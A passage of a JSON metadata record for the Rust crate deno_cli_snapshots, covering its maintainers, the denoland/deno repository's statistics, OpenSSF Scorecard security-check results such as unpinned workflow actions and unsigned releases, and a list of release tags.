Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-01-05T13:06:42.365Z","updated_at":"2026-01-05T13:06:42.365Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-01-05T13:06:42.448Z","updated_at":"2026-01-05T13:06:42.448Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047103,"name":"deno_cli_snapshots","ecosystem":"cargo","description":"Provides snapshots for the deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2019-08-20T02:38:02.450Z","latest_release_published_at":"2019-09-25T23:47:22.019Z","latest_release_number":"0.19.0","last_synced_at":"2026-09-07T22:59:40.776Z","created_at":"2022-04-12T09:58:21.922Z","updated_at":"2026-09-08T13:16:43.564Z","registry_url":"https://crates.io/crates/deno_cli_snapshots/","install_command":"cargo install deno_cli_snapshots","documentation_url":"https://docs.rs/deno_cli_snapshots/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"htt